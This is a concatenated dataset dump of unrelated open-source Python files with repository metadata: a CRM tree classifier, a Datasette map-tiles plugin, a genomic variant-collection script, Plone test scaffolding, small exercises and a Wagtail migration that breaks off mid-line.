dd9947fc7776c6931faffc56c6329f2422b0f5d0 | 04a77043cebd9415069aad4a6b8e7af077de1168 | /1-pbase/day11/exmple/filter.py | c8a7fa97539cd633362bc8a071f7fe9afc4d4bc4 | [] | no_license | yangxiangtao/biji | a935fbc4af42c81205900cb95a11e98c16d739de | 5c5f46e6c145fc02ea10b7befdc05c489fc3b945 | refs/heads/master | 2022-11-12T02:25:51.532838 | 2019-04-02T01:22:12 | 2019-04-02T01:22:12 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 204 | py | # def is_odd(x):
# return x%2==1
# for x in filter(is_odd,range(20)):
# print(x)
# for x in filter(lambda x:x%2==1,range(10)):
# print(x)
L=list(filter(lambda x: x%2==1,range(10)))
print(L) | [
"[email protected]"
] | |
a8bedaa690e6167e7b41d66bab84ec2b45aa2730 | a7b592be95dc2af9fdb56725f44e98cc59166e6f | /apps/ncrm/classify_tree/__init__.py | 1bdb2878103c34846ea3bb162078fbd95ea785dd | [] | no_license | cash2one/CRM-3 | bc864c462d155b5dc6a51a5edbd564574b3e2f94 | cedcaeb397ccadb36952534242bd296c5b4513bb | refs/heads/master | 2021-06-14T07:40:53.572013 | 2017-05-23T15:52:06 | 2017-05-23T15:52:06 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 10,249 | py | # coding=UTF-8
import itertools, datetime
from bson.objectid import ObjectId
from apps.ncrm.models import TreeTemplate, PlanTree, pt_coll, ptr_coll, Customer
from apps.common.biz_utils.utils_cacheadapter import CrmCacheAdapter
from apps.common.utils.utils_log import log
from .field import FieldManager
from .node import TreeNode
from .parser import TreePasser
__all__ = ["build_tree", "read_tree_branch"]
class CustomerLoader(object):
def __init__(self):
pass
def loading(self, load_fields, customer_mapping):
load_funcs = set(itertools.chain(*[ field.load_func for field in load_fields ]))
for load_func in load_funcs:
if callable(load_func):
load_func(customer_mapping)
for customer in customer_mapping.values():
for field in load_fields:
if callable(field.custom_func):
field_result = field.custom_func(customer)
setattr(customer, field.name, field_result)
# if getattr(customer, field.name) :
# print "{} : {} - {}".format(customer.shop_id, field.name, getattr(customer, field.name))
return customer_mapping
class Classifier(object):
def __init__(self, parser_cls, loader_cls, node_container):
self.parser = parser_cls
self.node_container = node_container
self.loader = loader_cls
self.cache_backend = CrmCacheAdapter()
self.timeout = 60 * 60 * 30
def load_customers_bypath(self, path, psuser):
tree_id = path.split("_", 1)[0]
if tree_id.isdigit():
cache_key = "{}_{}".format(psuser.id, path)
shop_id_list = self.cache_backend.get(cache_key)
if shop_id_list is None:
tree_template = TreeTemplate.get_tree_byid(int(tree_id))
self(tree_template, psuser)
shop_id_list = self.cache_backend.get(path) or []
else:
shop_id_list = self.get_plan_tree_shops(path)
return shop_id_list
def get_plan_tree_shops(self, path):
def get_child_data_list(node_data, key, result_list):
if node_data['child_list']:
for child in node_data['child_list']:
get_child_data_list(child, key, result_list)
else:
value = node_data[key]
if type(value) is list:
result_list.extend(node_data[key])
else:
result_list.append(value)
return result_list
node_path_list = path.split("_")
node_data = PlanTree.get_tree_byid(node_path_list[0])
for i in node_path_list[1:]:
node_data = node_data['child_list'][int(i)]
shop_id_list = list(set(get_child_data_list(node_data, 'shop_id_list', [])))
return shop_id_list
# def get_path_by_shop_id(self, shop_id, tree_template):
# path = None
# customer_mapping = {customer.shop_id:customer for customer in Customer.objects.filter(shop_id=shop_id)}
# if customer_mapping:
# # 加载及解析树
# fields_mapping = FieldManager.read_allfields_mapping()
# parser = self.parser(tree_template, self.node_container, fields_mapping)
#
# # 挂载用于计算的数据
# self.loader().loading(parser.related_fields, customer_mapping)
#
# tree_data = parser.hungon_people_counter(customer_mapping)
# path_list = [_path for _path, shop_id_list in tree_data.items() if shop_id in shop_id_list]
# path_list.append(str(tree_template.id))
# path_list.sort()
# path = path_list[-1]
#
# return path
def get_path_by_shop_id(self, shop_id, tree_data):
path = None
if shop_id in tree_data.get('shop_id_list', []):
path = tree_data.get('path')
else:
for child_data in tree_data.get('child_list', []):
path = self.get_path_by_shop_id(shop_id, child_data)
if path:
break
return path
def get_or_create_path_by_shop_id(self, shop_id, tree_id, tree_data):
path = self.get_path_by_shop_id(shop_id, tree_data)
if not path:
if tree_data['child_list']:
rest_node_list = filter(lambda x: not x['cond_list'], tree_data['child_list'])
if rest_node_list:
path = rest_node_list[0]['path']
rest_node_list[0]['shop_id_list'].append(shop_id)
rest_node_list[0]['shop_count'] = len(rest_node_list[0]['shop_id_list'])
else:
path = '%s_%s'% (tree_data['path'], len(tree_data['child_list']))
tree_data['child_list'].append({
'name': '其他',
'desc': '',
'goal': {},
'child_list': [],
'cond_list': [],
'path': path,
'shop_count': 1,
'shop_id_list': [shop_id]
})
else:
path = tree_data['path']
tree_data['shop_id_list'].append(shop_id)
tree_data['shop_count'] += 1
PlanTree.update_tree(tree_id, tree_data)
return path
def load_plan_tree_record(self, tree_id, start_time, tree_data):
rec_dict = {}
def load_data(tree_data):
tree_data.update({'record':{k: 0 for k, _ in PlanTree.GOAL_KEY_CHOICES}})
if tree_data['child_list']:
for child_data in tree_data['child_list']:
load_data(child_data)
for k in tree_data['record']:
tree_data['record'][k] += child_data['record'][k]
else:
for k in tree_data['record']:
if tree_data['path'] in rec_dict:
tree_data['record'][k] = rec_dict[tree_data['path']].get(k, 0)
pipeline = [
{
'$match':{
'tree_id': ObjectId(tree_id),
'create_time': {
'$gte': start_time,
}
}
},
{
'$group':{
'_id': {
'path': '$path',
'rec_type': '$rec_type'
},
'rec_value': {'$sum': '$rec_value'}
}
},
{
'$project':{
'_id': 0,
'path': '$_id.path',
'rec_type': '$_id.rec_type',
'rec_value': 1
}
}
]
rec_list = ptr_coll.aggregate(pipeline)['result']
for rec in rec_list:
rec_dict.setdefault(rec['path'], {})[rec['rec_type']] = rec['rec_value']
load_data(tree_data)
def auto_insert_record(self, psuser, shop_id, nick, rec_type, rec_value, create_time):
try:
plan_tree = list(pt_coll.find({
'psuser_id': psuser.id,
'status': 1,
'start_time':{'$lte':create_time},
'end_time':{'$gt':create_time - datetime.timedelta(days=1)}
}))
if plan_tree:
plan_tree = plan_tree[0]
# tree_obj = PlanTree.get_tree_template(plan_tree)
# path = self.get_path_by_shop_id(shop_id, tree_obj)
path = self.get_or_create_path_by_shop_id(shop_id, plan_tree['_id'], plan_tree)
if path:
ptr_coll.insert({
'tree_id': plan_tree['_id'],
'path': path,
'shop_id': shop_id,
'nick': nick,
'rec_type': rec_type,
'rec_value': rec_value,
'psuser_id': 0,
'psuser_cn': '系统',
'create_time': create_time
})
except Exception, e:
log.error('build_tree.auto_insert_record error, e=%s' % e)
def __call__(self, tree_template, psuser, is_stat = True, cat_id_list = None, plan_stat = False):
# 初始化用户客户数据
if cat_id_list:
customer_mapping = {customer.shop_id:customer for customer in psuser.mycustomers_withcat if customer.cat_id in cat_id_list}
else:
customer_mapping = {customer.shop_id:customer for customer in psuser.mycustomers}
# 加载及解析树
fields_mapping = FieldManager.read_allfields_mapping()
parser = self.parser(tree_template, self.node_container, fields_mapping)
if is_stat:
# 挂在用于计算的数据
self.loader().loading(parser.related_fields, customer_mapping)
# 计算机缓存数据
cache_result = parser.hungon_people_counter(customer_mapping)
cache_result = {'{}_{}'.format(psuser.id, key):val for key, val in cache_result.items()}
self.cache_backend.set_many(cache_result, self.timeout) # 记录缓存
# 逆向解析数据
tree_data = parser.parser_to_json()
if plan_stat:
# 统计计划树目标跟踪数据
self.load_plan_tree_record(tree_template.id, tree_template.start_time, tree_data)
return tree_data
def refresh_plan_tree(self, tree_id, tree_data, psuser):
try:
tree_doc = PlanTree.get_tree_byid(tree_id)
tree_doc.update(tree_data)
tree_obj = PlanTree.get_tree_template(tree_doc)
tree_doc = self(tree_obj, psuser)
tree_doc.update(tree_data)
PlanTree.update_tree(tree_id, tree_doc)
except Exception, e:
print 'build_tree.refresh_plan_tree error, tree_id=%s, e=%s' % (tree_id, e)
build_tree = Classifier(TreePasser, CustomerLoader, TreeNode)
read_tree_branch = build_tree.load_customers_bypath
load_all_fields = FieldManager.read_all_fields | [
"[email protected]"
] | |
0ba46ca25f7954a614e976605f8cede03101b4ed | 1356c64ee93435b3d312c8abbf0cfbdf28935645 | /2565_electric_flex_20191212.py | 3984d15a3a4e99cec8677dff6cf213d5e661f827 | [] | no_license | tmtmaj/algorithm_2019_12_03 | 48829c6c03fa1b4528fc161056303c30eab1a31a | bf86bd36a044978fa3a60b65a7a248de2a2052ac | refs/heads/master | 2021-06-25T05:07:42.726320 | 2021-05-08T14:20:02 | 2021-05-08T14:20:02 | 225,642,301 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,501 | py | # import sys
# cmd = lambda: sys.stdin.readline()
#
# def x_func(e_list):
# e_list = e_list
# x_list = [0 for _ in range(len(e_list))]
#
# for i in range(len(e_list)):
# for j in range(i + 1, len(e_list)):
# if (e_list[i][0] > e_list[j][0] and e_list[i][1] < e_list[j][1]) or (e_list[i][0] < e_list[j][0] and e_list[i][1] > e_list[j][1]):
# x_list[i] += 1
# x_list[j] += 1
#
# return x_list
#
#
# N = int(cmd().strip())
# e_list = []
# cnt = 0
#
# for _ in range(N):
# e_list.append(list(map(int, cmd().strip().split())))
#
# x_list = [0 for _ in range(N)]
#
# # print(e_list)
# for i in range(N):
# for j in range(i+1, N):
# if (e_list[i][0] > e_list[j][0] and e_list[i][1] < e_list[j][1]) or (e_list[i][0] < e_list[j][0] and e_list[i][1] > e_list[j][1]):
# x_list[i] += 1
# x_list[j] += 1
#
# # print(x_list)
#
# while max(x_list) != 0:
# max_x = max(x_list)
# max_x_index = x_list.index(max_x)
# del e_list[max_x_index]
# x_list = x_func(e_list)
# cnt += 1
# print(x_list)
# print(e_list)
#
# print(cnt)
import sys
cmd = lambda: sys.stdin.readline()
N = int(cmd().strip())
e_list = [list(map(int, cmd().strip().split())) for _ in range(N)]
e_list.sort(key = lambda x: x[0])
lis = [1]
for i in range(1, N):
lis.append(1)
for j in range(i):
if e_list[i][1] > e_list[j][1] and lis[j] + 1 > lis[i]:
lis[i] = lis[j] + 1
print(N - max(lis)) | [
"[email protected]"
] | |
48c0e9e27a52eafca750b8ee40a439230b894fcf | 116aadef9866be33782c6cbd06901703728295cc | /datasette_tiles/__init__.py | f8a2f4b9cec6f2c18358bdf5ac7b743a850c6d3f | [
"Apache-2.0"
] | permissive | dracos/datasette-tiles | 9c4cf6ca683a703f08e1f69cbc4def3694d7bcc3 | f7aa1a49df23584445cf154ad0e3e6d750965b15 | refs/heads/main | 2023-02-28T22:33:08.331682 | 2021-02-03T22:21:57 | 2021-02-03T22:21:57 | 335,932,265 | 0 | 0 | null | 2021-02-04T11:24:40 | 2021-02-04T11:24:39 | null | UTF-8 | Python | false | false | 6,641 | py | from datasette import hookimpl
from datasette.utils.asgi import Response, NotFound
from datasette_tiles.utils import detect_mtiles_databases, tiles_stack_database_order
import json
# 256x256 PNG of colour #dddddd, compressed using https://squoosh.app
PNG_404 = (
b"\x89PNG\r\n\x1a\n\x00\x00\x00\rIHDR\x00\x00\x01\x00\x00\x00\x01\x00\x04\x00\x00"
b"\x00\x00\xbc\xe9\x1a\xbb\x00\x00\x00\x9cIDATx\xda\xed\xce1\x01\x00\x00\x0c\x02"
b"\xa0\xd9?\xe3\xba\x18\xc3\x07\x12\x90\xbf\xad\x08\x08\x08\x08\x08\x08\x08\x08"
b"\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08"
b"\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08"
b"\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08"
b"\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08"
b"\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08"
b"\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\xac"
b"\x03\x05\xddg\xde\x01\xd26\xe7\xdd\x00\x00\x00\x00IEND\xaeB`\x82"
)
SELECT_TILE_SQL = """
select
tile_data
from
tiles
where
zoom_level = :z
and tile_column = :x
and tile_row = :y
""".strip()
@hookimpl
def register_routes():
return [
(r"/-/tiles$", index),
(r"/-/tiles/(?P<db_name>[^/]+)$", explorer),
(r"/-/tiles/(?P<db_name>[^/]+)/(?P<z>\d+)/(?P<x>\d+)/(?P<y>\d+)\.png$", tile),
(r"/-/tiles-stack$", tiles_stack_explorer),
(r"/-/tiles-stack/(?P<z>\d+)/(?P<x>\d+)/(?P<y>\d+)\.png$", tiles_stack),
]
async def index(datasette):
return Response.html(
await datasette.render_template(
"tiles_index.html",
{"mbtiles_databases": await detect_mtiles_databases(datasette)},
)
)
async def load_tile(db, request):
z = request.url_vars["z"]
x = request.url_vars["x"]
y = request.url_vars["y"]
result = await db.execute(
SELECT_TILE_SQL,
{
"z": z,
"x": x,
"y": y,
},
)
if not result.rows:
return None
return result.rows[0][0]
async def tile(request, datasette):
db_name = request.url_vars["db_name"]
mbtiles_databases = await detect_mtiles_databases(datasette)
if db_name not in mbtiles_databases:
raise NotFound("Not a valid mbtiles database")
db = datasette.get_database(db_name)
tile = await load_tile(db, request)
if tile is None:
return Response(body=PNG_404, content_type="image/png", status=404)
return Response(body=tile, content_type="image/png")
async def tiles_stack(datasette, request):
priority_order = await tiles_stack_database_order(datasette)
# Try each database in turn
for database in priority_order:
tile = await load_tile(database, request)
if tile is not None:
return Response(body=tile, content_type="image/png")
return Response(body=PNG_404, content_type="image/png", status=404)
async def explorer(datasette, request):
db_name = request.url_vars["db_name"]
mbtiles_databases = await detect_mtiles_databases(datasette)
if db_name not in mbtiles_databases:
raise NotFound("Not a valid mbtiles database")
db = datasette.get_database(db_name)
metadata = {
row["name"]: row["value"]
for row in (await db.execute("select name, value from metadata")).rows
}
default_latitude = 0
default_longitude = 0
default_zoom = 0
if metadata.get("center") and len(metadata["center"].split(",")) == 3:
default_longitude, default_latitude, default_zoom = metadata["center"].split(
","
)
min_zoom = 0
max_zoom = 19
if metadata.get("minzoom"):
min_zoom = metadata["minzoom"]
if metadata.get("maxzoom"):
max_zoom = metadata["maxzoom"]
attribution = metadata.get("attribution") or None
return Response.html(
await datasette.render_template(
"tiles_explorer.html",
{
"metadata": metadata,
"db_name": db_name,
"db_path": datasette.urls.database(db_name),
"default_latitude": default_latitude,
"default_longitude": default_longitude,
"default_zoom": default_zoom,
"min_zoom": min_zoom,
"max_zoom": max_zoom,
"attribution": json.dumps(attribution),
},
)
)
async def tiles_stack_explorer(datasette):
attribution = ""
# Find min/max zoom by looking at the stack
priority_order = await tiles_stack_database_order(datasette)
min_zooms = []
max_zooms = []
attributions = []
for db in priority_order:
metadata = {
row["name"]: row["value"]
for row in (await db.execute("select name, value from metadata")).rows
}
if "minzoom" in metadata:
min_zooms.append(int(metadata["minzoom"]))
if "maxzoom" in metadata:
max_zooms.append(int(metadata["maxzoom"]))
# If all attributions are the same, use that - otherwise leave blank
if len(set(attributions)) == 1:
attribution = attributions[0]
min_zoom = min(min_zooms)
max_zoom = max(max_zooms)
return Response.html(
await datasette.render_template(
"tiles_stack_explorer.html",
{
"default_latitude": 0,
"default_longitude": 0,
"default_zoom": min_zoom,
"min_zoom": min_zoom,
"max_zoom": max_zoom,
"attribution": json.dumps(attribution),
},
)
)
@hookimpl
def database_actions(datasette, database):
async def inner():
mbtiles_databases = await detect_mtiles_databases(datasette)
if database in mbtiles_databases:
return [
{
"href": datasette.urls.path("/-/tiles/{}".format(database)),
"label": "Explore these tiles on a map",
}
]
return inner
@hookimpl
def table_actions(datasette, database, table):
async def inner():
if table != "tiles":
return None
mbtiles_databases = await detect_mtiles_databases(datasette)
if database in mbtiles_databases:
return [
{
"href": datasette.urls.path("/-/tiles/{}".format(database)),
"label": "Explore these tiles on a map",
}
]
return inner
| [
"[email protected]"
] | |
38ae0d1a558d1e120aea23f100feba10b508b6d0 | 5789f30bc942dde4235668c56408575b0bd25599 | /variantBase/variantList/collect_run_variants_to_variantlist.py | 62ac9d99d2ae82a73481e7879aa4aacca561689e | [] | no_license | bioinfo-chu-bdx/ngs-somatic | bc9dfa60872a644f18650593d144726d0ab22767 | 8cc6411e16784f2891b92241a97c71788408ffb5 | refs/heads/master | 2023-04-25T19:48:52.073672 | 2021-03-19T14:21:49 | 2021-03-19T14:21:49 | 374,675,975 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,329 | py | #!/usr/bin/python
import sys
import re
import json
import xlrd
import glob
import os
import openpyxl
# THIS SCRIPT UPDATE THE COMPLETE VariantList_ALL.json FROM RUN LIST OR SINGLE RUN FOLDER IN ARGV.
# VARIANTLIST JSON CONTAINS RunName, Sample, Variant Data (chrm, start, stop, ref, alt, varcov, poscov). EXEMPLE :
#"Auto_user_PGM-165-Run98_35pM_Chef_SBT_colon_lung_v4_318v2_234": {
#"SAMPLE-AF454G": [
#["chr4", 55599436, 55599436, "T", "C", 405, 1245],
#["chr7", 55599438, 55599438, "G", "C", 120, 1040],
# ]
# USAGE : python collect_run_variants_to_variantlist.py
# OR : python collect_run_variants_to_variantlist.py /path/to/run_folder
pipeline_folder = os.environ['NGS_PIPELINE_BX_DIR']
variant_list_path = '%s/variantBase/variantList/variantList_ALL.json' % pipeline_folder
run_list_path = '%s/variantBase/runList/runList_ALL.fullpath.txt' % pipeline_folder
variantlist = {}
if os.path.exists(variant_list_path):
with open(variant_list_path, 'r') as g:
variantlist = json.load(g)
run2write_ordered = []
if len(sys.argv)>1:
run_list = [sys.argv[1]]
else:
run_list = []
rl = open(run_list_path,'r')
for run in rl:
run_folder = run.replace('\n','')
run_list.append(run_folder)
for run_folder in run_list:
# RUN TABLE
if run_folder.endswith('/'):
run = run_folder.split('/')[-2]
else:
run = run_folder.split('/')[-1]
run2write_ordered.append(run)
barcodes_json = False
with open(run_folder+'/barcodes.json', 'r') as g:
barcodes_json = json.load(g)
if run not in variantlist:
variantlist[run] = {}
else:
print "*already in variantlist* %s" % run
continue
print "- collecting %s ..." % run
for barcode in barcodes_json:
sample = barcodes_json[barcode]['sample']
dna_number = barcodes_json[barcode]['sample_id']
#if dna_number == 'CONTROL':
#continue
if sample not in variantlist[run]:
variantlist[run][sample] = []
finalreport_paths = glob.glob('%s/%s/*%s_%s*finalReport*'%(run_folder,sample,sample,barcode))
if finalreport_paths:
for fp_path in finalreport_paths:
if '~$' in fp_path: # fichier temporaire
continue
if fp_path.endswith('.xls'):
#xlrd
fp = xlrd.open_workbook(fp_path)
anno_sheet = fp.sheet_by_index(0)
for j in range(anno_sheet.ncols):
if anno_sheet.cell_value(0,j) in ['Chr','chr','Chromosome','chromosome','chrom','Chrom']:
chromosome_index = j
elif anno_sheet.cell_value(0,j) in ['Start_Position','Position','Start.Pos','Start.Pos.','Start','start','Position','Pos.']:
start_index = j
elif anno_sheet.cell_value(0,j) in ['Ref.seq','Ref.Seq','Ref.seq.','Ref.Seq.','Ref','ref']:
ref_index = j
elif anno_sheet.cell_value(0,j) in ['Var.seq','Var.Seq','Alt','Var.seq.','Var.Seq.','alt']:
alt_index = j
elif anno_sheet.cell_value(0,j) in ['Var.Cov.','var.cov.']:
varcov_index = j
elif anno_sheet.cell_value(0,j) in ['Pos.Cov.','Depth']:
poscov_index = j
### PARSE XLS
for i in range(1,anno_sheet.nrows):
chrm = anno_sheet.cell_value(i,chromosome_index)
ref = anno_sheet.cell_value(i,ref_index)
alt = anno_sheet.cell_value(i,alt_index)
if chrm and ref and alt :
start = int(anno_sheet.cell_value(i,start_index))
varcov = int(anno_sheet.cell_value(i,varcov_index))
poscov = int(anno_sheet.cell_value(i,poscov_index))
if ref == '-':
stop = start + 1
elif alt == '-':
if len(ref) > 1:
stop = start+(len(ref)-1)
else:
stop = start
elif len(ref) > 1 or len(alt) > 1:
if len(ref) > 1:
stop = start+(len(ref)-1)
else:
stop = start
else:
stop = start
variant = [str(chrm),start,stop,str(ref),str(alt),varcov,poscov]
if variant not in variantlist[run][sample]:
variantlist[run][sample].append(variant)
elif fp_path.endswith('.xlsx'):
#openpyxl
fp = openpyxl.load_workbook(fp_path)
anno_sheetname = fp.sheetnames[0]
anno_sheet = fp[anno_sheetname]
for ncol in range(anno_sheet.max_column):
if anno_sheet.cell(row=1,column=ncol+1).value in ['Chr','chr','Chromosome','chromosome','chrom','Chrom']:
chromosome_index = ncol+1
elif anno_sheet.cell(row=1,column=ncol+1).value in ['Start_Position','Position','Start.Pos','Start.Pos.','Start','start','Position','Pos.']:
start_index = ncol+1
elif anno_sheet.cell(row=1,column=ncol+1).value in ['Ref.seq','Ref.Seq','Ref.seq.','Ref.Seq.','Ref','ref']:
ref_index = ncol+1
elif anno_sheet.cell(row=1,column=ncol+1).value in ['Var.seq','Var.Seq','Alt','Var.seq.','Var.Seq.','alt']:
alt_index = ncol+1
if anno_sheet.cell(row=1,column=ncol+1).value in ['Var.Cov.','var.cov.']:
varcov_index = ncol+1
if anno_sheet.cell(row=1,column=ncol+1).value in ['Pos.Cov.','Depth']:
poscov_index = ncol+1
### PARSE XLSX
for nrow in range(2,anno_sheet.max_row+1):
chrm = anno_sheet.cell(row=nrow,column=chromosome_index).value
ref = anno_sheet.cell(row=nrow,column=ref_index).value
alt = anno_sheet.cell(row=nrow,column=alt_index).value
if chrm and ref and alt :
start = int(anno_sheet.cell(row=nrow,column=start_index).value)
varcov = int(anno_sheet.cell(row=nrow,column=varcov_index).value)
poscov = int(anno_sheet.cell(row=nrow,column=poscov_index).value)
if ref == '-':
stop = start + 1
elif alt == '-':
if len(ref) > 1:
stop = start+(len(ref)-1)
else:
stop = start
elif len(ref) > 1 or len(alt) > 1:
if len(ref) > 1:
stop = start+(len(ref)-1)
else:
stop = start
else:
stop = start
variant = [str(chrm),start,stop,str(ref),str(alt),varcov,poscov]
if variant not in variantlist[run][sample]:
variantlist[run][sample].append(variant)
else:
print "**WARNING (FINALREPORT FILE EXTENSION weird )** %s" % fp_path
#print "\t- %s : %s variants" % (sample,len(variantlist[run][sample]))
else:
print "**WARNING (NO FINALREPORT found for SAMPLE )** %s" % sample
print "- WRITING VARIANTLIST JSON..."
# routine d'ecriture differente de json dumps indent qui prend trop de lignes
with open(variant_list_path,'w') as vljson:
vljson.write('{\n')
for i in range(len(run2write_ordered)) :
run = run2write_ordered[i]
vljson.write('\t"%s": {\n' % run)
for j in range(len(variantlist[run].keys())):
sample = variantlist[run].keys()[j]
vljson.write('\t\t"%s": [\n' % (sample))
for k in range(len(variantlist[run][sample])):
variant = str(variantlist[run][sample][k]).replace('\'','"').replace('u"','"')
if k == (len(variantlist[run][sample])-1):
vljson.write('\t\t\t%s\n' % variant)
else:
vljson.write('\t\t\t%s,\n' % variant)
if j == (len(variantlist[run].keys())-1):
vljson.write('\t\t]\n')
else:
vljson.write('\t\t],\n')
if i == (len(run2write_ordered)-1):
vljson.write('\t}\n')
else:
vljson.write('\t},\n')
vljson.write('}\n')
| [
"[email protected]"
] | |
f4ed06e7ea8b347da25f534ba02242feff4c32b1 | 0e878d60050d3e34f33ab3f1bbfc0a0551e421d9 | /fui/fsbrowse/tests/base.py | 998b0711d09a90a7b2461a7454bea1d2aacf71dc | [] | no_license | espenak/fui.fsbrowse | bca49b7a82ffcad8e984490ed486d7038062ae8c | ba2ddd37f2fde9b0189336f50c995849de25ac45 | refs/heads/master | 2021-01-20T09:41:17.205327 | 2009-11-06T12:48:51 | 2009-11-06T12:48:51 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,062 | py | from Products.Five import zcml
from Products.Five import fiveconfigure
from Testing import ZopeTestCase as ztc
from Products.PloneTestCase import PloneTestCase as ptc
from Products.PloneTestCase.layer import onsetup
from Products.Five.testbrowser import Browser
from zope.component import getUtility, getMultiAdapter
from plone.portlets.interfaces import IPortletManager
from plone.portlets.interfaces import IPortletAssignmentMapping
from Products.PloneTestCase.setup import portal_owner, default_password
@onsetup
def setup_fui_fsbrowse():
"""Set up the additional products required for the fui.fsbrowse product.
The @onsetup decorator causes the execution of this body to be deferred
until the setup of the Plone site testing layer.
"""
# Load the ZCML configuration for the optilux.policy package.
# This includes the other products below as well.
fiveconfigure.debug_mode = True
import fui.fsbrowse
zcml.load_config('configure.zcml', fui.fsbrowse)
fiveconfigure.debug_mode = False
# We need to tell the testing framework that these products
# should be available. This can't happen until after we have loaded
# the ZCML.
ztc.installPackage('fui.fsbrowse')
# The order here is important: We first call the (deferred) function which
# installs the products we need for the Optilux package. Then, we let
# PloneTestCase set up this product on installation.
setup_fui_fsbrowse()
ptc.setupPloneSite(products=['fui.fsbrowse'])
class FuiFsBrowseTestCase(ptc.PloneTestCase):
"""Base class used for test cases. """
class FuiFsBrowseFunctionalTestCase(ptc.FunctionalTestCase):
"""Test case class used for functional (doc-)tests """
def afterSetUp(self):
self.browser = Browser()
# The following is useful when writing and debugging testself.browser tests. It lets
# us see error messages properly.
self.browser.handleErrors = False
self.portal.error_log._ignored_exceptions = ()
# We then turn off the various portlets, because they sometimes duplicate links
# and text (e.g. the navtree, the recent recent items listing) that we wish to
# test for in our own views. Having no portlets makes things easier.
left_column = getUtility(IPortletManager, name=u"plone.leftcolumn")
left_assignable = getMultiAdapter((self.portal, left_column), IPortletAssignmentMapping)
for name in left_assignable.keys():
del left_assignable[name]
right_column = getUtility(IPortletManager, name=u"plone.rightcolumn")
right_assignable = getMultiAdapter((self.portal, right_column), IPortletAssignmentMapping)
for name in right_assignable.keys():
del right_assignable[name]
def loginAdminClick(self):
portal_url = self.portal.absolute_url()
self.browser.open(portal_url + '/login_form?came_from=' + portal_url)
self.browser.getControl(name='__ac_name').value = portal_owner
self.browser.getControl(name='__ac_password').value = default_password
self.browser.getControl(name='submit').click()
def logoutClick(self):
portal_url = self.portal.absolute_url()
self.browser.getLink("Log out").click()
| [
"[email protected]"
] | |
1b2e1b202bfb75864577236b2e5b92566bd75690 | 0c8cbe2f3d69c92dcd0cc73da88f1340624809f2 | /search/urls.py | 3063c9854c0b76535380cbf020f58478264616b5 | [] | no_license | JunchuangYang/OnlineMusicWebsite | 83451b03aad5ba8bf8a7402a8e7f21ca5c0d1c24 | 475ebea77e8488f08883203e509cc8b7c9043bbd | refs/heads/master | 2021-07-25T01:27:14.673494 | 2020-04-05T08:23:07 | 2020-04-05T08:23:07 | 252,178,555 | 0 | 0 | null | 2021-06-10T22:43:53 | 2020-04-01T13:09:47 | JavaScript | UTF-8 | Python | false | false | 151 | py | #__author__ = 'lenovo'
from django.urls import path
from . import views
urlpatterns = [
path('<int:page>.html',views.searchView ,name = 'search')
] | [
"[email protected]"
] | |
c08b6e8b95dcab03de174a133fc3da3f3b4e96d6 | 3d4161df479ef3335470f44fab40cfe42ec7889f | /cms/migrations/0002_personindexpage_personpage.py | f6d9419d89a20ff321207ee21b6f727f034ce8fb | [
"MIT"
] | permissive | kingsdigitallab/kdl-django | 540f680697c92a83da1e575b51259915284d979f | 14836dae329616d1cf1ad5b8c24508b6588b1300 | refs/heads/master | 2021-01-10T08:22:39.995509 | 2020-09-17T13:11:07 | 2020-09-17T13:11:07 | 60,765,060 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,331 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.9.8 on 2016-07-21 09:50
from __future__ import unicode_literals
import cms.models.streamfield
from django.db import migrations, models
import django.db.models.deletion
import wagtail.wagtailcore.blocks
import wagtail.wagtailcore.fields
import wagtail.wagtaildocs.blocks
import wagtail.wagtailembeds.blocks
import wagtail.wagtailimages.blocks
class Migration(migrations.Migration):
dependencies = [
('wagtailcore', '0028_merge'),
('wagtailimages', '0013_make_rendition_upload_callable'),
('cms', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='PersonIndexPage',
fields=[
('page_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='wagtailcore.Page')),
('body', wagtail.wagtailcore.fields.StreamField([(b'h2', wagtail.wagtailcore.blocks.CharBlock(classname='title', icon='title')), (b'h3', wagtail.wagtailcore.blocks.CharBlock(classname='title', icon='title')), (b'h4', wagtail.wagtailcore.blocks.CharBlock(classname='title', icon='title')), (b'h5', wagtail.wagtailcore.blocks.CharBlock(classname='title', icon='title')), (b'intro', wagtail.wagtailcore.blocks.RichTextBlock(icon='pilcrow')), (b'paragraph', wagtail.wagtailcore.blocks.RichTextBlock(icon='pilcrow')), (b'pullquote', wagtail.wagtailcore.blocks.StructBlock([(b'quote', wagtail.wagtailcore.blocks.TextBlock('quote title')), (b'attribution', wagtail.wagtailcore.blocks.CharBlock())])), (b'image', wagtail.wagtailcore.blocks.StructBlock([(b'image', wagtail.wagtailimages.blocks.ImageChooserBlock()), (b'caption', wagtail.wagtailcore.blocks.RichTextBlock()), (b'alignment', cms.models.streamfield.ImageFormatChoiceBlock())], icon='image', label='Aligned image')), (b'document', wagtail.wagtaildocs.blocks.DocumentChooserBlock(icon='doc-full-inverse')), (b'page', wagtail.wagtailcore.blocks.StructBlock([(b'page', wagtail.wagtailcore.blocks.PageChooserBlock()), (b'label', wagtail.wagtailcore.blocks.CharBlock())], icon='link')), (b'embed', wagtail.wagtailembeds.blocks.EmbedBlock(icon='media')), (b'html', wagtail.wagtailcore.blocks.StructBlock([(b'html', wagtail.wagtailcore.blocks.RawHTMLBlock()), (b'alignment', cms.models.streamfield.HTMLAlignmentChoiceBlock())], icon='code', label='Raw HTML')), (b'map_html', wagtail.wagtailcore.blocks.StructBlock([(b'html', 